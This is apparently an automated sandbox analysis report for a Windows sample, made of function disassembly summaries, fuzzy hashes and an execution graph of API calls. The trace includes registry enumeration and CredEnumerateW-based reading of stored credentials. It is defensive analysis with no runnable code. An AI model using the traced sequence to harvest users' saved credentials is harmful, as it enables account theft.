                                            • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                            • Opcode Fuzzy Hash: dbfa2e27eb608a9f9479d75297a1486c58e4153ca5a873f0eddd30e24b8e668e
                                            • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                            Function 00408ADC Relevance: 5.1, APIs: 4, Instructions: 63COMMON
                                            Download Yara Rule
                                            APIs
                                            • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                              • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                              • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                              • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                            • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                            • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                            • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcmp$memcpy
                                            • String ID:
                                            • API String ID: 231171946-0
                                            • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                            • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                            • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                            • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                            Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • strlen.MSVCRT ref: 0040B0D8
                                            • free.MSVCRT ref: 0040B0FB
                                              • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                              • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                              • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                            • free.MSVCRT ref: 0040B12C
                                            • memcpy.MSVCRT(00000000,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: free$memcpy$mallocstrlen
                                            • String ID:
                                            • API String ID: 3669619086-0
                                            • Opcode ID: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                            • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                            • Opcode Fuzzy Hash: 04e6466bee9c2f86a7d5fc6531cc0ab8b23c91005f7f75429686add4e9716e46
                                            • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                            Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                                            Download Yara Rule
                                            APIs
                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                            • malloc.MSVCRT ref: 00417407
                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                            • free.MSVCRT ref: 00417425
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWide$freemalloc
                                            • String ID:
                                            • API String ID: 2605342592-0
                                            • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                            • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                            • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                            • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                            Function 00409D1F Relevance: 5.0, APIs: 4, Instructions: 32COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: wcslen$wcscat$wcscpy
                                            • String ID:
                                            • API String ID: 1961120804-0
                                            • Opcode ID: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                            • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                            • Opcode Fuzzy Hash: 053325bc158fb100898e7a98b0c486d6a7ee737d4dfc05f729e58fd5416b10d2
                                            • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                            Execution Graph

                                            Execution Coverage:2.4%
                                            Dynamic/Decrypted Code Coverage:19.9%
                                            Signature Coverage:0.5%
                                            Total number of Nodes:869
                                            Total number of Limit Nodes:22
                                            execution_graph 33878 40fc40 70 API calls 34051 403640 21 API calls 33879 427fa4 42 API calls 34052 412e43 _endthreadex 34053 425115 76 API calls __fprintf_l 34054 43fe40 133 API calls 33882 425115 83 API calls __fprintf_l 33883 401445 memcpy memcpy DialogBoxParamA 33884 440c40 34 API calls 33886 411853 RtlInitializeCriticalSection memset 33887 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34060 40a256 13 API calls 34062 432e5b 17 API calls 34064 43fa5a 20 API calls 33889 401060 41 API calls 34067 427260 CloseHandle memset memset 32943 410c68 FindResourceA 32944 410c81 SizeofResource 32943->32944 32947 410cae 32943->32947 32945 410c92 LoadResource 32944->32945 32944->32947 32946 410ca0 LockResource 32945->32946 32945->32947 32946->32947 34069 405e69 14 API calls 33894 433068 15 API calls __fprintf_l 34071 414a6d 18 API calls 34072 43fe6f 134 API calls 33896 424c6d 15 API calls __fprintf_l 34073 426741 19 API calls 33898 440c70 17 API calls 33899 443c71 44 API calls 33902 427c79 24 API calls 34076 416e7e memset __fprintf_l 33905 43f400 15 API calls 33906 42800b 47 API calls 33907 425115 82 API calls __fprintf_l 34079 41960c 61 API calls 33908 43f40c 122 API calls __fprintf_l 33911 411814 InterlockedCompareExchange RtlDeleteCriticalSection 33912 43f81a 20 API calls 33914 414c20 memset memset 33915 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34083 414625 18 API calls 34084 404225 modf 34085 403a26 strlen WriteFile 34087 40422a 12 API calls 34091 427632 memset memset memcpy 34092 40ca30 59 API calls 34093 404235 26 API calls 33917 425115 76 API calls __fprintf_l 34094 425115 77 API calls __fprintf_l 34096 44223a 38 API calls 33923 43183c 112 API calls 34097 44b2c5 _onexit __dllonexit 34102 42a6d2 memcpy __allrem 33925 405cda 65 API calls 34110 43fedc 138 API calls 34111 4116e1 16 API calls __fprintf_l 33928 4244e6 19 API calls 33930 42e8e8 127 API calls __fprintf_l 33931 4118ee RtlLeaveCriticalSection 34116 43f6ec 22 API calls 33933 425115 119 API calls __fprintf_l 32933 410cf3 EnumResourceNamesA 34119 4492f0 memcpy memcpy 34121 43fafa 18 API calls 34123 4342f9 15 API calls __fprintf_l 33934 4144fd 19 API calls 34125 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34126 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34129 443a84 _mbscpy 34131 43f681 17 API calls 33937 404487 22 API calls 34133 415e8c 16 API calls __fprintf_l 33941 411893 RtlDeleteCriticalSection __fprintf_l 33942 41a492 42 API calls 34137 403e96 34 API calls 34138 410e98 memset SHGetPathFromIDList SendMessageA 33944 426741 109 API calls __fprintf_l 33945 4344a2 18 API calls 33946 4094a2 10 API calls 34141 4116a6 15 API calls __fprintf_l 34142 43f6a4 17 API calls 34143 440aa3 20 API calls 34145 427430 45 API calls 33949 4090b0 7 API calls 33950 4148b0 15 API calls 33952 4118b4 RtlEnterCriticalSection 33953 4014b7 CreateWindowExA 33954 40c8b8 19 API calls 33956 4118bf RtlTryEnterCriticalSection 34150 42434a 18 API calls __fprintf_l 34152 405f53 12 API calls 33964 43f956 59 API calls 33966 40955a 17 API calls 33967 428561 36 API calls 33968 409164 7 API calls 34156 404366 19 API calls 34160 40176c ExitProcess 34163 410777 42 API calls 33973 40dd7b 51 API calls 33974 425d7c 16 API calls __fprintf_l 34165 43f6f0 25 API calls 34166 42db01 22 API calls 33975 412905 15 API calls __fprintf_l 34167 403b04 54 API calls 34168 405f04 SetDlgItemTextA GetDlgItemTextA 34169 44b301 ??3@YAXPAX 34172 4120ea 14 API calls 3 library calls 34173 40bb0a 8 API calls 34175 413f11 strcmp 33979 434110 17 API calls __fprintf_l 33981 425115 108 API calls __fprintf_l 34176 444b11 _onexit 33983 425115 76 API calls __fprintf_l 33986 429d19 10 API calls 34179 444b1f __dllonexit 34180 409f20 _strcmpi 33988 42b927 31 API calls 34183 433f26 19 API calls __fprintf_l 34184 44b323 FreeLibrary 34185 427f25 46 API calls 34186 43ff2b 17 API calls 34187 43fb30 19 API calls 33995 414d36 16 API calls 33997 40ad38 7 API calls 34189 433b38 16 API calls __fprintf_l 33869 44b33b 33870 44b344 ??3@YAXPAX 33869->33870 33871 44b34b 33869->33871 33870->33871 33872 44b354 ??3@YAXPAX 33871->33872 33873 44b35b 33871->33873 33872->33873 33874 44b364 ??3@YAXPAX 33873->33874 33875 44b36b 33873->33875 33874->33875 33876 44b374 ??3@YAXPAX 33875->33876 33877 44b37b 33875->33877 33876->33877 34001 426741 21 API calls 34002 40c5c3 125 API calls 34004 43fdc5 17 API calls 34190 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34007 4161cb memcpy memcpy memcpy memcpy 32948 44b3cf 32949 44b3e6 32948->32949 32959 44b454 32948->32959 32949->32959 32961 44b40e GetModuleHandleA 32949->32961 32950 44b45d GetModuleHandleA 32954 44b467 32950->32954 32951 44b49a 32974 44b49f 32951->32974 32954->32954 32956 44b487 GetProcAddress 32954->32956 32954->32959 32955 44b405 32955->32954 32957 44b428 GetProcAddress 32955->32957 32955->32959 32956->32959 32958 44b435 VirtualProtect 32957->32958 32957->32959 32958->32959 32960 44b444 VirtualProtect 32958->32960 32959->32950 32959->32951 32959->32954 32960->32959 32962 44b417 32961->32962 32970 44b454 32961->32970 32993 44b42b GetProcAddress 32962->32993 32964 44b41c 32968 44b428 GetProcAddress 32964->32968 32964->32970 32965 44b45d GetModuleHandleA 32972 44b467 32965->32972 32966 44b49a 32967 44b49f 776 API calls 32966->32967 32967->32966 32969 44b435 VirtualProtect 32968->32969 32968->32970 32969->32970 32971 44b444 VirtualProtect 32969->32971 32970->32965 32970->32966 32970->32972 32971->32970 32972->32970 32973 44b487 GetProcAddress 32972->32973 32973->32970 32975 444c4a 32974->32975 32976 444c56 GetModuleHandleA 32975->32976 32977 444c68 __set_app_type __p__fmode __p__commode 32976->32977 32979 444cfa 32977->32979 32980 444d02 __setusermatherr 32979->32980 32981 444d0e 32979->32981 32980->32981 33002 444e22 _controlfp 32981->33002 32983 444d13 _initterm __getmainargs _initterm 32984 444d6a GetStartupInfoA 32983->32984 32986 444d9e GetModuleHandleA 32984->32986 33003 40cf44 32986->33003 32990 444dcf _cexit 32992 444e04 32990->32992 32991 444dc8 exit 32991->32990 32992->32951 32994 44b454 32993->32994 32995 44b435 VirtualProtect 32993->32995 32997 44b45d GetModuleHandleA 32994->32997 32998 44b49a 32994->32998 32995->32994 32996 44b444 VirtualProtect 32995->32996 32996->32994 33001 44b467 32997->33001 32999 44b49f 776 API calls 32998->32999 32999->32998 33000 44b487 GetProcAddress 33000->33001 33001->32994 33001->33000 33002->32983 33054 404a99 LoadLibraryA 33003->33054 33005 40cf60 33040 40cf64 33005->33040 33062 410d0e 33005->33062 33007 40cf6f 33066 40ccd7 ??2@YAPAXI 33007->33066 33009 40cf9b 33080 407cbc 33009->33080 33014 40cfc4 33098 409825 memset 33014->33098 33015 40cfd8 33103 4096f4 memset 33015->33103 33020 40d181 ??3@YAXPAX 33022 40d1b3 33020->33022 33023 40d19f DeleteObject 33020->33023 33021 407e30 _strcmpi 33024 40cfee 33021->33024 33127 407948 free free 33022->33127 33023->33022 33026 40cff2 RegDeleteKeyA 33024->33026 33027 40d007 EnumResourceTypesA 33024->33027 33026->33020 33029 40d047 33027->33029 33030 40d02f MessageBoxA 33027->33030 33028 40d1c4 33128 4080d4 free 33028->33128 33032 40d0a0 CoInitialize 33029->33032 33108 40ce70 33029->33108 33030->33020 33125 40cc26 strncat memset RegisterClassA CreateWindowExA 33032->33125 33034 40d1cd 33129 407948 free free 33034->33129 33036 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33126 40c256 PostMessageA 33036->33126 33040->32990 33040->32991 33041 40d061 ??3@YAXPAX 33041->33022 33044 40d084 DeleteObject 33041->33044 33042 40d09e 33042->33032 33044->33022 33046 40d0f9 GetMessageA 33047 40d17b CoUninitialize 33046->33047 33048 40d10d 33046->33048 33047->33020 33049 40d113 TranslateAccelerator 33048->33049 33051 40d145 IsDialogMessage 33048->33051 33052 40d139 IsDialogMessage 33048->33052 33049->33048 33050 40d16d GetMessageA 33049->33050 33050->33047 33050->33049 33051->33050 33053 40d157 TranslateMessage DispatchMessageA 33051->33053 33052->33050 33052->33051 33053->33050 33055 404ac4 GetProcAddress 33054->33055 33058 404aec 33054->33058 33056 404add FreeLibrary 33055->33056 33059 404ad4 33055->33059 33057 404ae8 33056->33057 33056->33058 33057->33058 33060 404b13 33058->33060 33061 404afc MessageBoxA 33058->33061 33059->33056 33060->33005 33061->33005 33063 410d17 LoadLibraryA 33062->33063 33064 410d3c 33062->33064 33063->33064 33065 410d2b GetProcAddress 33063->33065 33064->33007 33065->33064 33067 40cd08 ??2@YAPAXI 33066->33067 33069 40cd26 33067->33069 33070 40cd2d 33067->33070 33137 404025 6 API calls 33069->33137 33072 40cd66 33070->33072 33073 40cd59 DeleteObject 33070->33073 33130 407088 33072->33130 33073->33072 33075 40cd6b 33133 4019b5 33075->33133 33078 4019b5 strncat 33079 40cdbf _mbscpy 33078->33079 33079->33009 33139 407948 free free 33080->33139 33082 407e04 33140 407a55 33082->33140 33085 407ddc 33085->33082 33152 407a1f 33085->33152 33086 407a1f malloc memcpy free free 33092 407cf7 33086->33092 33088 407d7a free 33088->33092 33092->33082 33092->33085 33092->33086 33092->33088 33143 40796e 7 API calls 33092->33143 33144 406f30 33092->33144 33094 407e30 33095 407e57 33094->33095 33096 407e38 33094->33096 33095->33014 33095->33015 33096->33095 33097 407e41 _strcmpi 33096->33097 33097->33095 33097->33096 33158 4097ff 33098->33158 33100 409854 33163 409731 33100->33163 33104 4097ff 3 API calls 33103->33104 33105 409723 33104->33105 33183 40966c 33105->33183 33197 4023b2 33108->33197 33114 40ced3 33286 40cdda 7 API calls 33114->33286 33115 40cece 33118 40cf3f 33115->33118 33238 40c3d0 memset GetModuleFileNameA strrchr 33115->33238 33118->33041 33118->33042 33121 40ceed 33265 40affa 33121->33265 33125->33036 33126->33046 33127->33028 33128->33034 33129->33040 33138 406fc7 memset _mbscpy 33130->33138 33132 40709f CreateFontIndirectA 33132->33075 33134 4019e1 33133->33134 33135 4019c2 strncat 33134->33135 33136 4019e5 memset LoadIconA 33134->33136 33135->33134 33136->33078 33137->33070 33138->33132 33139->33092 33141 407a65 33140->33141 33142 407a5b free 33140->33142 33141->33094 33142->33141 33143->33092 33145 406f37 malloc 33144->33145 33146 406f7d 33144->33146 33148 406f73 33145->33148 33149 406f58 33145->33149 33146->33092 33148->33092 33150 406f6c free 33149->33150 33151 406f5c memcpy 33149->33151 33150->33148 33151->33150 33153 407a38 33152->33153 33154 407a2d free 33152->33154 33156 406f30 3 API calls 33153->33156 33155 407a43 33154->33155 33157 40796e 7 API calls 33155->33157 33156->33155 33157->33082 33174 406f96 GetModuleFileNameA 33158->33174 33160 409805 strrchr 33161 409814 33160->33161 33162 409817 _mbscat 33160->33162 33161->33162 33162->33100 33175 44b090 33163->33175 33168 40930c 3 API calls 33169 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33168->33169 33170 4097c5 LoadStringA 33169->33170 33173 4097db 33170->33173 33172 4097f3 33172->33020 33173->33170 33173->33172 33182 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33173->33182 33174->33160 33176 40973e _mbscpy _mbscpy 33175->33176 33177 40930c 33176->33177 33178 44b090 33177->33178 33179 409319 memset GetPrivateProfileStringA 33178->33179 33180 409364 WritePrivateProfileStringA 33179->33180 33181 409374 33179->33181 33180->33181 33181->33168 33182->33173 33193 406f81 GetFileAttributesA 33183->33193 33185 409675 33186 4096ee 33185->33186 33187 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33185->33187 33186->33021 33194 409278 GetPrivateProfileStringA 33187->33194 33189 4096c9 33195 409278 GetPrivateProfileStringA 33189->33195 33191 4096da 33196 409278 GetPrivateProfileStringA 33191->33196 33193->33185 33194->33189 33195->33191 33196->33186 33288 409c1c 33197->33288 33200 401e69 memset 33327 410dbb 33200->33327 33203 401ec2 33357 4070e3 strlen _mbscat _mbscpy _mbscat 33203->33357 33204 401ed4 33342 406f81 GetFileAttributesA 33204->33342 33207 401ee6 strlen strlen 33209 401f15 33207->33209 33211 401f28 33207->33211 33358 4070e3 strlen _mbscat _mbscpy _mbscat 33209->33358 33343 406f81 GetFileAttributesA 33211->33343 33213 401f35 33344 401c31 33213->33344 33216 401f75 33356 410a9c RegOpenKeyExA 33216->33356 33218 401c31 7 API calls 33218->33216 33219 401f91 33220 402187 33219->33220 33221 401f9c memset 33219->33221 33223 402195 ExpandEnvironmentStringsA 33220->33223 33224 4021a8 _strcmpi 33220->33224 33359 410b62 RegEnumKeyExA 33221->33359 33368 406f81 GetFileAttributesA 33223->33368 33224->33114 33224->33115 33226 40217e RegCloseKey 33226->33220 33227 401fd9 atoi 33228 401fef memset memset sprintf 33227->33228 33235 401fc9 33227->33235 33360 410b1e 33228->33360 33231 402165 33231->33226 33232 402076 memset memset strlen strlen 33232->33235 33233 4070e3 strlen _mbscat _mbscpy _mbscat 33233->33235 33234 4020dd strlen strlen 33234->33235 33235->33226 33235->33227 33235->33231 33235->33232 33235->33233 33235->33234 33236 406f81 GetFileAttributesA 33235->33236 33237 402167 _mbscpy 33235->33237 33367 410b62 RegEnumKeyExA 33235->33367 33236->33235 33237->33226 33239 40c422 33238->33239 33240 40c425 _mbscat _mbscpy _mbscpy 33238->33240 33239->33240 33241 40c49d 33240->33241 33242 40c512 33241->33242 33243 40c502 GetWindowPlacement 33241->33243 33244 40c538 33242->33244 33389 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33242->33389 33243->33242 33382 409b31 33244->33382 33248 40ba28 33249 40ba87 33248->33249 33253 40ba3c 33248->33253 33392 406c62 LoadCursorA SetCursor 33249->33392 33251 40ba8c 33393 410a9c RegOpenKeyExA 33251->33393 33394 404785 33251->33394 33397 403c16 33251->33397 33473 4107f1 33251->33473 33476 404734 33251->33476 33252 40ba43 _mbsicmp 33252->33253 33253->33249 33253->33252 33484 40b5e5 10 API calls 33253->33484 33254 40baa0 33255 407e30 _strcmpi 33254->33255 33258 40bab0 33255->33258 33256 40bafa SetCursor 33256->33121 33258->33256 33259 40baf1 qsort 33258->33259 33259->33256 33844 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33265->33844 33267 40b00e 33268 40b016 33267->33268 33269 40b01f GetStdHandle 33267->33269 33845 406d1a CreateFileA 33268->33845 33271 40b01c 33269->33271 33272 40b035 33271->33272 33273 40b12d 33271->33273 33846 406c62 LoadCursorA SetCursor 33272->33846 33850 406d77 9 API calls 33273->33850 33276 40b136 33287 40c580 28 API calls 33276->33287 33277 40b042 33278 40b087 33277->33278 33284 40b0a1 33277->33284 33847 40a57c strlen WriteFile 33277->33847 33278->33284 33848 40a699 12 API calls 33278->33848 33281 40b0d6 33282 40b116 CloseHandle 33281->33282 33283 40b11f SetCursor 33281->33283 33282->33283 33283->33276 33284->33281 33849 406d77 9 API calls 33284->33849 33286->33115 33287->33118 33300 409a32 33288->33300 33291 409c80 memcpy memcpy 33292 409cda 33291->33292 33292->33291 33293 409d18 ??2@YAPAXI ??2@YAPAXI 33292->33293 33294 408db6 12 API calls 33292->33294 33295 409d54 ??2@YAPAXI 33293->33295 33297 409d8b 33293->33297 33294->33292 33295->33297 33297->33297 33310 409b9c 33297->33310 33299 4023c1 33299->33200 33301 409a44 33300->33301 33302 409a3d ??3@YAXPAX 33300->33302 33303 409a52 33301->33303 33304 409a4b ??3@YAXPAX 33301->33304 33302->33301 33305 409a63 33303->33305 33306 409a5c ??3@YAXPAX 33303->33306 33304->33303 33307 409a83 ??2@YAPAXI ??2@YAPAXI 33305->33307 33308 409a73 ??3@YAXPAX 33305->33308 33309 409a7c ??3@YAXPAX 33305->33309 33306->33305 33307->33291 33308->33309 33309->33307 33311 407a55 free 33310->33311 33312 409ba5 33311->33312 33313 407a55 free 33312->33313 33314 409bad 33313->33314 33315 407a55 free 33314->33315 33316 409bb5 33315->33316 33317 407a55 free 33316->33317 33318 409bbd 33317->33318 33319 407a1f 4 API calls 33318->33319 33320 409bd0 33319->33320 33321 407a1f 4 API calls 33320->33321 33322 409bda 33321->33322 33323 407a1f 4 API calls 33322->33323 33324 409be4 33323->33324 33325 407a1f 4 API calls 33324->33325 33326 409bee 33325->33326 33326->33299 33328 410d0e 2 API calls 33327->33328 33329 410dca 33328->33329 33330 410dfd memset 33329->33330 33369 4070ae 33329->33369 33331 410e1d 33330->33331 33372 410a9c RegOpenKeyExA 33331->33372 33335 401e9e strlen strlen 33335->33203 33335->33204 33336 410e4a 33337 410e7f _mbscpy 33336->33337 33373 410d3d _mbscpy 33336->33373 33337->33335 33339 410e5b 33374 410add RegQueryValueExA 33339->33374 33341 410e73 RegCloseKey 33341->33337 33342->33207 33343->33213 33375 410a9c RegOpenKeyExA 33344->33375 33346 401c4c 33347 401cad 33346->33347 33376 410add RegQueryValueExA 33346->33376 33347->33216 33347->33218 33349 401c6a 33350 401c71 strchr 33349->33350 33351 401ca4 RegCloseKey 33349->33351 33350->33351 33352 401c85 strchr 33350->33352 33351->33347 33352->33351 33353 401c94 33352->33353 33377 406f06 strlen 33353->33377 33355 401ca1 33355->33351 33356->33219 33357->33204 33358->33211 33359->33235 33380 410a9c RegOpenKeyExA 33360->33380 33362 410b34 33363 410b5d 33362->33363 33381 410add RegQueryValueExA 33362->33381 33363->33235 33365 410b4c RegCloseKey 33365->33363 33367->33235 33368->33224 33370 4070bd GetVersionExA 33369->33370 33371 4070ce 33369->33371 33370->33371 33371->33330 33371->33335 33372->33336 33373->33339 33374->33341 33375->33346 33376->33349 33378 406f17 33377->33378 33379 406f1a memcpy 33377->33379 33378->33379 33379->33355 33380->33362 33381->33365 33383 409b40 33382->33383 33385 409b4e 33382->33385 33390 409901 memset SendMessageA 33383->33390 33386 409b99 33385->33386 33387 409b8b 33385->33387 33386->33248 33391 409868 SendMessageA 33387->33391 33389->33244 33390->33385 33391->33386 33392->33251 33393->33254 33395 4047a3 33394->33395 33396 404799 FreeLibrary 33394->33396 33395->33254 33396->33395 33398 4107f1 FreeLibrary 33397->33398 33399 403c30 LoadLibraryA 33398->33399 33400 403c74 33399->33400 33401 403c44 GetProcAddress 33399->33401 33403 4107f1 FreeLibrary 33400->33403 33401->33400 33402 403c5e 33401->33402 33402->33400 33406 403c6b 33402->33406 33404 403c7b 33403->33404 33405 404734 3 API calls 33404->33405 33407 403c86 33405->33407 33406->33404 33485 4036e5 33407->33485 33410 4036e5 27 API calls 33411 403c9a 33410->33411 33412 4036e5 27 API calls 33411->33412 33413 403ca4 33412->33413 33414 4036e5 27 API calls 33413->33414 33415 403cae 33414->33415 33497 4085d2 33415->33497 33423 403ce5 33424 403cf7 33423->33424 33680 402bd1 40 API calls 33423->33680 33545 410a9c RegOpenKeyExA 33424->33545 33427 403d0a 33428 403d1c 33427->33428 33681 402bd1 40 API calls 33427->33681 33546 402c5d 33428->33546 33432 4070ae GetVersionExA 33433 403d31 33432->33433 33564 410a9c RegOpenKeyExA 33433->33564 33435 403d51 33436 403d61 33435->33436 33682 402b22 47 API calls 33435->33682 33565 410a9c RegOpenKeyExA 33436->33565 33439 403d87 33440 403d97 33439->33440 33683 402b22 47 API calls 33439->33683 33566 410a9c RegOpenKeyExA 33440->33566 33443 403dbd 33444 403dcd 33443->33444 33684 402b22 47 API calls 33443->33684 33567 410808 33444->33567 33448 404785 FreeLibrary 33449 403de8 33448->33449 33571 402fdb 33449->33571 33452 402fdb 34 API calls 33453 403e00 33452->33453 33587 4032b7 33453->33587 33462 403e3b 33463 403e73 33462->33463 33464 403e46 _mbscpy 33462->33464 33634 40fb00 33463->33634 33686 40f334 334 API calls 33464->33686 33474 410807 33473->33474 33475 4107fc FreeLibrary 33473->33475 33474->33254 33475->33474 33477 404785 FreeLibrary 33476->33477 33478 40473b LoadLibraryA 33477->33478 33479 40474c GetProcAddress 33478->33479 33482 40476e 33478->33482 33480 404764 33479->33480 33479->33482 33480->33482 33481 404781 33481->33254 33482->33481 33483 404785 FreeLibrary 33482->33483 33483->33481 33484->33253 33486 4037c5 33485->33486 33487 4036fb 33485->33487 33486->33410 33687 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33487->33687 33489 40370e 33489->33486 33490 403716 strchr 33489->33490 33490->33486 33491 403730 33490->33491 33688 4021b6 memset 33491->33688 33493 40373f _mbscpy _mbscpy strlen 33494 4037a4 _mbscpy 33493->33494 33495 403789 sprintf 33493->33495 33689 4023e5 16 API calls 33494->33689 33495->33494 33498 4085e2 33497->33498 33690 4082cd 11 API calls 33498->33690 33502 408600 33503 403cba 33502->33503 33504 40860b memset 33502->33504 33515 40821d 33503->33515 33693 410b62 RegEnumKeyExA 33504->33693 33506 4086d2 RegCloseKey 33506->33503 33508 408637 33508->33506 33509 40865c memset 33508->33509 33694 410a9c RegOpenKeyExA 33508->33694 33697 410b62 RegEnumKeyExA 33508->33697 33695 410add RegQueryValueExA 33509->33695 33512 408694 33696 40848b 10 API calls 33512->33696 33514 4086ab RegCloseKey 33514->33508 33698 410a9c RegOpenKeyExA 33515->33698 33517 40823f 33518 403cc6 33517->33518 33519 408246 memset 33517->33519 33527 4086e0 33518->33527 33699 410b62 RegEnumKeyExA 33519->33699 33521 4082bf RegCloseKey 33521->33518 33523 40826f 33523->33521 33700 410a9c RegOpenKeyExA 33523->33700 33701 4080ed 11 API calls 33523->33701 33702 410b62 RegEnumKeyExA 33523->33702 33526 4082a2 RegCloseKey 33526->33523 33703 4045db 33527->33703 33530 4088ef 33711 404656 33530->33711 33532 40872d 33532->33530 33535 408737 wcslen 33532->33535 33534 40872b CredEnumerateW 33534->33532 33535->33530 33541 40876a 33535->33541 33536 40877a wcsncmp 33536->33541 33538 404734 3 API calls 33538->33541 33539 404785 FreeLibrary 33539->33541 33540 408812 memset 33540->33541 33542 40883c memcpy wcschr 33540->33542 33541->33530 33541->33536 33541->33538 33541->33539 33541->33540 33541->33542 33543 4088c3 